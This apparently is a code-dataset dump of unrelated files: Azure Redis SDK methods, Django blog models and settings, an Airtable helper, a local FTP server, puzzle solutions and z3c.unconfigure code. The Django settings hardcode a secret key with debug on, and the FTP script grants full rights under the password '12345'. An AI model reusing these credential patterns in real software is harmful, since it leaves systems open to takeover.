self, resource_group_name, name, key_type, custom_headers=None, raw=False, **operation_config):
"""Regenerate redis cache's access keys. This operation requires write
permission to the cache resource.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param key_type: Which redis access key to reset. Possible values
include: 'Primary', 'Secondary'
:type key_type: str or :class:`RedisKeyType
<azure.mgmt.redis.models.RedisKeyType>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`RedisListKeysResult
<azure.mgmt.redis.models.RedisListKeysResult>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.RedisRegenerateKeyParameters(key_type=key_type)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}/regenerateKey'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'RedisRegenerateKeyParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('RedisListKeysResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def force_reboot(
self, resource_group_name, name, reboot_type, shard_id=None, custom_headers=None, raw=False, **operation_config):
"""Reboot specified redis node(s). This operation requires write
permission to the cache resource. There can be potential data loss.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param reboot_type: Which redis node(s) to reboot. Depending on this
value data loss is possible. Possible values include: 'PrimaryNode',
'SecondaryNode', 'AllNodes'
:type reboot_type: str or :class:`RebootType
<azure.mgmt.redis.models.RebootType>`
:param shard_id: In case of cluster cache, this specifies shard id
which should be rebooted.
:type shard_id: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.RedisRebootParameters(reboot_type=reboot_type, shard_id=shard_id)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}/forceReboot'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'RedisRebootParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def import_method(
self, resource_group_name, name, files, format=None, custom_headers=None, raw=False, **operation_config):
"""Import data into redis cache.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param files: files to import
:type files: list of str
:param format: File format.
:type format: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.ImportRDBParameters(format=format, files=files)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}/import'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ImportRDBParameters')
# Construct and send request
def long_running_send():
request = self._client.post(url, query_parameters)
return self._client.send(
request, header_parameters, body_content, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
def export(
self, resource_group_name, name, parameters, custom_headers=None, raw=False, **operation_config):
"""Import data into redis cache.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param name: The name of the redis cache.
:type name: str
:param parameters: Parameters for redis export operation.
:type parameters: :class:`ExportRDBParameters
<azure.mgmt.redis.models.ExportRDBParameters>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cache/Redis/{name}/export'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ExportRDBParameters')
# Construct and send request
def long_running_send():
request = self._client.post(url, query_parameters)
return self._client.send(
request, header_parameters, body_content, **operation_config)
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
return self._client.send(
request, header_parameters, **operation_config)
def get_long_running_output(response):
if response.status_code not in [202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
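# --- Usage sketch (illustrative; not part of the generated SDK) ---
# Assuming a configured RedisManagementClient exposes this operations group
# as `client.redis` (credentials and subscription id set up elsewhere),
# the methods above are typically driven like this:
#
#   cache = client.redis.get('my-group', 'my-cache')
#   keys = client.redis.list_keys('my-group', 'my-cache')
#   poller = client.redis.export('my-group', 'my-cache', export_params)
#   poller.wait()  # AzureOperationPoller blocks until the LRO completes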
|
[
"admin@example.com"
] |
admin@example.com
|
52c6be96fc5d3a791c96d286c9fc69b887c703e3
|
62d64a7422cd9802dd4bb9d308f14dce6d3468a0
|
/Base/BaseFile.py
|
3c6d1555955429ce4442a25ad6d3e0417ff207cc
|
[] |
no_license
|
ruby1045/vboardAutoTest
|
de3798c0828cf51f2f9e043a7b402f23c31752dc
|
de8a89bab13905b43bc9d7971d1576dab641c30d
|
refs/heads/master
| 2020-03-18T11:46:50.467592
| 2018-05-29T07:59:29
| 2018-05-29T07:59:29
| 134,690,857
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 681
|
py
|
__author__ = 'vBoardTester'
import os
'''
File operations
'''
def write_data(f, method='w+', data=""):
if not os.path.isfile(f):
        print('File does not exist; failed to write data')
else:
with open(f, method, encoding="utf-8") as fs:
fs.write(data + "\n")
def mkdir_file(f, method='w+'):
if not os.path.isfile(f):
with open(f, method, encoding="utf-8") as fs:
print("创建文件%s成功" % f)
pass
else:
print("%s文件已经存在,创建失败" % f)
pass
def remove_file(f):
if os.path.isfile(f):
os.remove(f)
else:
print("%s文件不存在,无法删除" % f)
|
[
"ruby1045@163.com"
] |
ruby1045@163.com
|
a22a66cf39f2a58463446a3541d9c9859761d617
|
69b93223fc6794123269022a02e5a1dcf130e698
|
/121_Best_Time_to_Buy_and_Sell_Stock.py
|
4d71cc2baeef778bf9fc8bc85c27e8cf66d6a37d
|
[] |
no_license
|
GuangyuZheng/leet_code_python
|
43b984ce98cc889a7e07151004d347cb03b2d9b2
|
266def94df8245f90ea5b6885fc472470b189e51
|
refs/heads/master
| 2020-09-05T18:12:07.649374
| 2020-02-22T09:37:59
| 2020-02-22T09:37:59
| 220,177,486
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 368
|
py
|
from typing import List
class Solution:
def maxProfit(self, prices: List[int]) -> int:
if len(prices) == 0:
return 0
min_price = prices[0]
m_profit = 0
for i in range(1, len(prices)):
min_price = min(min_price, prices[i])
m_profit = max(m_profit, prices[i] - min_price)
return m_profit
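# Worked example (illustrative): for prices = [7, 1, 5, 3, 6, 4] the running
# minimum bottoms out at 1 (index 1) and the best profit 6 - 1 = 5 appears at
# index 4; a strictly falling sequence yields 0.
# assert Solution().maxProfit([7, 1, 5, 3, 6, 4]) == 5
# assert Solution().maxProfit([7, 6, 4, 3, 1]) == 0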
|
[
"583621555@qq.com"
] |
583621555@qq.com
|
999da581a075c68eddb6c496ad7f6ce41d8f5236
|
46577f70342ef2cf811bcfc3756e1238482f8b3c
|
/blog/models.py
|
0231f1cbb1f9f638bf0952b18ec317bdb75e2848
|
[] |
no_license
|
13114848878/MyBlog
|
f3b4a38cceecdae7f761514e4ec452ba9dd41b90
|
f7ebfc47f9a5382d9dd7ff93157d0bddcafa4056
|
refs/heads/master
| 2020-08-06T20:12:55.399606
| 2019-10-13T14:11:08
| 2019-10-13T14:11:08
| 213,138,175
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,605
|
py
|
# coding:utf-8
from django.db import models
# Import Django's built-in User model
from django.contrib.auth.models import User
# Load the rich-text editor field classes
from DjangoUeditor.models import UEditorField
from mdeditor.fields import MDTextField
# Create your models here.
class Category(models.Model):
"""
    Article category table
"""
name = models.CharField('分类', max_length=100)
index = models.IntegerField(default=999, verbose_name='分类排序')
class Meta:
verbose_name = '分类'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Tag(models.Model):
"""
    Article tag table
"""
name = models.CharField('标签', max_length=30)
class Meta:
verbose_name = '标签'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Tui(models.Model):
"""
    Recommendations table
"""
name = models.CharField('推荐', max_length=30)
class Meta:
verbose_name = '推荐'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Banner(models.Model):
"""
    Carousel (slideshow) images
"""
text_info = models.CharField('图片信息', max_length=100, default='')
img = models.ImageField('轮播图', upload_to='banner/')
link_url = models.URLField('图片链接', max_length=100)
is_active = models.BooleanField('是否激活', default=False)
def __str__(self):
return self.text_info
class Meta:
verbose_name = '轮播图'
verbose_name_plural = verbose_name
class Link(models.Model):
"""
    Friendly links table
"""
name = models.CharField('链接名称',max_length=70)
link_url = models.URLField(max_length=100)
def __str__(self):
return self.name
class Meta:
verbose_name = '友情链接'
verbose_name_plural = verbose_name
class Article(models.Model):
title = models.CharField(verbose_name='标题', max_length=100)
excerpt = models.TextField(verbose_name='摘要', max_length=256, blank=True)
    # Foreign key to the category table; category-to-article is one-to-many
category = models.ForeignKey(Category, on_delete=models.CASCADE,
verbose_name='分类', blank=True, null=True)
    # Many-to-many relation to the tag table
tags = models.ManyToManyField(Tag, verbose_name='标签', blank=True,)
img = models.ImageField(upload_to='article_img/%Y/%m/%d/',
verbose_name='文章封面图片', blank=True, null=True)
# body = models.TextField(verbose_name='文章内容')
    # Replaced with a rich-text field.
# imagePath="upimg/", filePath="upfile/"
    # These two are the upload paths for images and files; uploaded files
    # land in the matching upimg and upfile directories under the project's media folder.
#
# body = UEditorField('内容', width=800, height=500,
# toolbars="full", imagePath="upimg/", filePath="upfile/",
# upload_settings={"imageMaxSize": 1204000},
# settings={}, command=None, blank=True,
# )
#
    # Use a Markdown rich-text field instead
body = MDTextField(verbose_name='文章内容')
"""
    Article author. User here is imported from django.contrib.auth.models.
    We link articles to User through this ForeignKey.
"""
user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name='作者')
views = models.PositiveIntegerField(verbose_name='阅读量', default=0)
tui = models.ForeignKey(Tui, on_delete=models.DO_NOTHING,
verbose_name='推荐位', blank=True, null=True)
created_time = models.DateTimeField(verbose_name='发布时间', auto_now_add=True)
modified_time = models.DateTimeField(verbose_name='修改时间', auto_now=True)
class Meta:
verbose_name = '文章'
verbose_name_plural = '文章'
def __str__(self):
return self.title
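# Usage sketch (illustrative; assumes migrations applied and a User exists):
# from django.contrib.auth.models import User
# author = User.objects.first()
# tech = Category.objects.create(name='Tech')
# Article.objects.create(title='Hello', body='...', category=tech, user=author)
# Article.objects.filter(category=tech).order_by('-created_time')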
|
[
"414319563@qq.com"
] |
414319563@qq.com
|
be02581c2e1ff9d55f4f09c85e9cf109f689ea46
|
cae10699b3deab7910e3df2b572a734387a32be6
|
/airtable_manager.py
|
3d6808d73541659a76442348b158e297bac374bf
|
[] |
no_license
|
sjhangiani12/connect
|
2df7d94125c297e0259f816a19afc6feee3af768
|
7eebebe69d49f9acc88c7701a53402f151ce986a
|
refs/heads/master
| 2022-12-18T00:48:56.112166
| 2020-08-23T19:47:46
| 2020-08-23T19:47:46
| 289,675,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,030
|
py
|
# from airtable get next name + source that is not muted.
# Take earliest date and if tied take random from remaining.
from airtable import Airtable
from keys import airtable_api_key, airtable_base_key
from datetime import datetime
airtable_obj = Airtable(base_key=airtable_base_key, table_name="contacts", api_key=airtable_api_key)
def get_friend():
for page in airtable_obj.get_iter(max_records=1, view="priority_queue"):
for record in page:
user_records = record
user_id = user_records["id"]
friend_id = user_id
friend_name = user_records["fields"]["name"]
friend_source = user_records["fields"]["source"]
return friend_id, friend_name, friend_source
def update_considering(friend_id, indicator):
update_dict = {"in_consideration": indicator}
airtable_obj.update(friend_id, update_dict)
print("marked as considering")
def get_considered():
for page in airtable_obj.get_iter(max_records=1, view="in_consideration"):
for record in page:
user_records = record
user_id = user_records["id"]
friend_id = user_id
friend_name = user_records["fields"]["name"]
friend_source = user_records["fields"]["source"]
return friend_id, friend_name, friend_source
def mark_as_skipped(friend_id):
update_dict = {"last_skipped": datetime.today().strftime("%Y-%m-%d")}
airtable_obj.update(friend_id, update_dict)
print("marked as skip")
def mute_person(friend_id):
update_dict = {"muted": True}
airtable_obj.update(friend_id, update_dict)
print("muted")
# did you talk to this person
# - get some response and record it as True or False
def mark_as_talked(friend_id, follow_up_val):
update_dict = {"follow_up": follow_up_val}
if follow_up_val:
update_dict = {"follow_up": follow_up_val,
"last_contact": datetime.today().strftime("%Y-%m-%d")}
airtable_obj.update(friend_id, update_dict)
print("marked date of convo")
|
[
"sjhangiani12@users.noreply.github.com"
] |
sjhangiani12@users.noreply.github.com
|
e9cba56d2439c33370a96611cdacbc6c7a3451fc
|
a91dc355662617269d90efdadc1c3d9cf3220f57
|
/CodeHS/2/17/5/Happy-Sad-Face-Travis.py
|
062a0836bfdb7ca718dbbc9378fc9066a4ed2411
|
[] |
no_license
|
CRTC-Computer-Engineering/CRTC-Python-Examples
|
112adbbe73f7841acb077153c454f06dec46c1e2
|
ae94d792cc5f5ba23c4a7356a02f85800d0c9c7e
|
refs/heads/master
| 2020-08-31T19:10:16.719526
| 2019-11-22T19:17:43
| 2019-11-22T19:17:43
| 218,763,254
| 2
| 1
| null | 2019-11-22T19:17:44
| 2019-10-31T12:41:58
|
Python
|
UTF-8
|
Python
| false
| false
| 923
|
py
|
from turtle import *  # assumed import: CodeHS preloads turtle, plain Python does not
speed(0)
penup()
pensize(10)
happy=input("Are you happy? (yes,no): ")
## Make a smile based on 0,0
def make_smile():
setposition(0,-70)
color("black")
pendown()
circle(60,90)
color("yellow")
circle(60,180)
color("black")
circle(60,90)
penup()
## Make a frown based on 0,0
def make_frown():
penup()
setposition(0,-120)
circle(60,90)
color("black")
pendown()
circle(60,180)
penup()
## Makes a circle and fills it
def make_eye():
color("black")
pendown()
begin_fill()
circle(20)
end_fill()
penup()
## navigation
setposition(0,-100)
color("yellow")
pendown()
begin_fill()
circle(100)
end_fill()
penup()
## Code branches to see if `happy` or `sad`
if happy == "yes":
make_smile()
elif happy == "no":
make_frown()
penup()
setposition(0,0)
left(90)
## Final Navigation
setposition(-30,25)
make_eye()
forward(70)
make_eye()
|
[
"travbuttons34@gmail.com"
] |
travbuttons34@gmail.com
|
12dfbcfb707df5b7be2620a8f2e84adc58652615
|
04333bf8cdf31ad8004283d9414d8b7947154808
|
/python/p029.py
|
440efdb56e2c155591c992ec87250d1074d4c54c
|
[] |
no_license
|
davidroeca/ProjectEuler
|
3868d7c4172a63fc83b04f95323962a005b34848
|
79cfa9041561edb0ac2ce258b8d6e224ecd1cfe0
|
refs/heads/master
| 2021-03-12T20:30:31.625852
| 2016-10-03T13:11:20
| 2016-10-03T13:11:20
| 41,495,588
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 908
|
py
|
"""
Problem 29:
Consider all integer combinations of a^b for 2 <= a <= 5 and 2 <= b <= 5:
2^2=4, 2^3=8, 2^4=16, 2^5=32
3^2=9, 3^3=27, 3^4=81, 3^5=243
4^2=16, 4^3=64, 4^4=256, 4^5=1024
5^2=25, 5^3=125, 5^4=625, 5^5=3125
If they are then placed in numerical order, with any repeats removed, we get the
following sequence of 15 distinct terms:
4, 8, 9, 16, 25, 27, 32, 64, 81, 125, 243, 256, 625, 1024, 3125
How many distinct terms are in the sequence generated by a^b for 2 <= a <= 100
and 2 <= b <= 100?
"""
def unique_list(iterable):
return list(set(iterable))
def get_n_unique_terms(iterable):
return len(unique_list(iterable))
def a_pow_b_gen(min_a=2, max_a=100, min_b=2, max_b=100):
for a in range(min_a, max_a + 1):
for b in range(min_b, max_b + 1):
yield a ** b
def main():
print(get_n_unique_terms(a_pow_b_gen()))
if __name__ == "__main__":
main()
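# Sanity check (illustrative): the 2..5 range from the docstring should give
# the 15 distinct terms listed there.
# assert get_n_unique_terms(a_pow_b_gen(2, 5, 2, 5)) == 15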
|
[
"david.roeca@gmail.com"
] |
david.roeca@gmail.com
|
9fb8ae8cb045e3f1e064f53ba7ed14a4c060d7b7
|
a1301fc01f98b5033f604cc564d73b97788e4ba9
|
/server.py
|
b2e633b6f90cf6336369b971739e41f586b219ed
|
[] |
no_license
|
stannumm/Basic-FTP-Project-
|
74f6cd1a11abe232ddc7f39426e704601b32674c
|
b250be2df6457170b7fe4d27e4f89b83b619e287
|
refs/heads/master
| 2020-03-06T23:12:45.323725
| 2018-03-28T11:04:19
| 2018-03-28T11:04:19
| 127,126,689
| 0
| 0
| null | null | null | null |
ISO-8859-9
|
Python
| false
| false
| 471
|
py
|
# server script
# taken from: https://pypi.python.org/pypi/pyftpdlib/
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
authorizer = DummyAuthorizer()
authorizer.add_user("user", "12345", "C:/Users/ahmet/Desktop/FTP", perm="elradfmwMT")
handler = FTPHandler
handler.authorizer = authorizer
server = FTPServer(("127.0.0.1", 21), handler)
server.serve_forever()
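# Client-side check (illustrative, stdlib only): connect with ftplib.
# from ftplib import FTP
# ftp = FTP()
# ftp.connect('127.0.0.1', 21)
# ftp.login('user', '12345')
# print(ftp.nlst())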
|
[
"noreply@github.com"
] |
stannumm.noreply@github.com
|
b032f4d5282db47874e320529199a0252434e484
|
efe5a8bb255d6084c13166f88611250780f7eaf7
|
/daiyeDRF2/settings.py
|
170641aab888f46c4576bc83d577d0a9ad888e7a
|
[] |
no_license
|
daiyeyue/daiyeDRF2
|
18c9cd413653e158f1d6ce6899f0db2b9202a78d
|
60ad6740845be973aee18b492861775fe8e0c1a9
|
refs/heads/master
| 2020-12-05T08:23:55.994814
| 2020-01-06T08:32:38
| 2020-01-06T08:32:38
| 232,057,475
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,207
|
py
|
"""
Django settings for daiyeDRF2 project.
Generated by 'django-admin startproject' using Django 1.11.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$qu+0c-!t!vl2$)1o!q8sy3mr8)^#rts&8i6cu=4(x)aky)y5y'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
    'rest_framework',  # framework required for DRF
'MySer',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'daiyeDRF2.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'daiyeDRF2.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
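# Usage sketch (illustrative): with DJANGO_SETTINGS_MODULE=daiyeDRF2.settings,
# the values above are read through django.conf:
# from django.conf import settings
# settings.INSTALLED_APPS  # includes 'rest_framework' and 'MySer'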
|
[
"150064328@qq.com"
] |
150064328@qq.com
|
47f9389ada1870d5ca97262115373be7f96efac5
|
d7ef079b36a0a6cd0b72fd8358c3ccd8865ed9f1
|
/eggs/z3c.unconfigure-1.0.1-py2.7.egg/z3c/unconfigure/config.py
|
bb7066970dba456707213c58ca7b6252574ed42e
|
[] |
no_license
|
vcabral19/productsgovit
|
8e7d104645d9c49b6502a44c640c7fef11bbb9fb
|
1a1f7321573d031e872a358f4c3510af2c05564d
|
refs/heads/master
| 2020-06-21T16:33:46.235438
| 2016-11-28T18:12:24
| 2016-11-28T18:12:24
| 74,784,667
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,143
|
py
|
##############################################################################
#
# Copyright (c) 2008 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""The 'unconfigure' grouping directive
"""
from zope.configuration import config
from zope.configuration.interfaces import IConfigurationContext
from zope.configuration.zopeconfigure import ZopeConfigure
from zope.security import adapter
import zope.component.zcml
def groupingDirectiveAllNS(_context, name, schema, handler,
usedIn=IConfigurationContext):
"""Registers a grouping directive with all namespaces.
"""
config.defineGroupingDirective(_context, name, schema, handler,
namespace="*", usedIn=usedIn)
def is_subscriber(discriminator, callable=None, args=(), kw={},
includepath=(), info='', order=0):
"""Determines whether the action has been emitted from the
<subscriber /> directive.
"""
return (discriminator is None and
callable is zope.component.zcml.handler and
args[0] == 'registerHandler')
def real_subscriber_factory(discriminator, callable=None, args=(), kw={},
includepath=(), info='', order=0):
"""Returns the real subscriber factory[#] and type of even that
the subscriber is registered for ('for' parameter).
This function assumes that the action in question is a subscriber
action. In other words, is_subscriber(*args) is True.
[#] Under certain circumstances, <subscriber /> wraps factories in
some security- or location-related adapter factory.
"""
factory = args[1]
for_ = args[2]
if isinstance(factory, (adapter.LocatingTrustedAdapterFactory,
adapter.LocatingUntrustedAdapterFactory,
adapter.TrustedAdapterFactory)):
factory = factory.factory
return factory, for_
class Unconfigure(ZopeConfigure):
def __init__(self, context, **kw):
super(Unconfigure, self).__init__(context, **kw)
# Make a new actions list here. This will shadow
# context.actions which would otherwise be "inherited" by our
# superclass's __getattr__. By shadowing the original list,
# all actions within 'unconfigure' will be added to this list
# here, not the global actions list.
self.actions = []
def after(self):
# Get a discriminator -> action representation of all the
# actions that have been churned out so far.
unique = dict((action[0], action) for action in self.context.actions
if action[0] is not None)
# Special-case subscriber actions: Find all subscriber actions
# and store them as (factory, for) -> action. They're a
# special case because their discriminators are None, so we
# can't pull the same trick as with other directives.
subscribers = dict((real_subscriber_factory(*action), action)
for action in self.context.actions
if is_subscriber(*action))
# Now let's go through the actions within 'unconfigure' and
# use their discriminator to remove the real actions
for unaction in self.actions:
# Special-case subscriber actions.
if is_subscriber(*unaction):
factory, for_ = real_subscriber_factory(*unaction)
action = subscribers.get((factory, for_))
if action is None:
continue
self.remove_action(action)
del subscribers[(factory, for_)]
# Generic from here
discriminator = unaction[0]
if discriminator is None:
continue
action = unique.get(discriminator)
if action is None:
# Trying to unconfigure something that hasn't been
# configured in the first place. Ignore.
continue
self.remove_action(action)
del unique[discriminator]
def remove_action(self, action):
# We can't actually remove actions because we mustn't change
# the length of the actions list. The main reason is that
# includeOverrides relies on the length of the action list
# (and we could easily be included via includeOverrides and
# therefore run into this problem). So let's simply replace
# actions with a null value. Actions whose callable is None
# won't be executed.
i = self.context.actions.index(action)
self.context.actions[i] = (None, None)
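# Illustration (not part of the original module): remove_action() nulls the
# entry in place, so the list length that includeOverrides depends on stays
# stable, e.g.:
# actions = [('d1', handler1), ('d2', handler2)]
# actions[0] = (None, None)  # "removed": a None callable is never executed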
|
[
"d828642@rede.sp"
] |
d828642@rede.sp
|
f25ec0e958173dc21a1bdf6a34fbd52f0fc929f1
|
ea871b12cdb62a73933200935a7e278738b358dd
|
/Misc_notUsed/rhymeCrawler.py
|
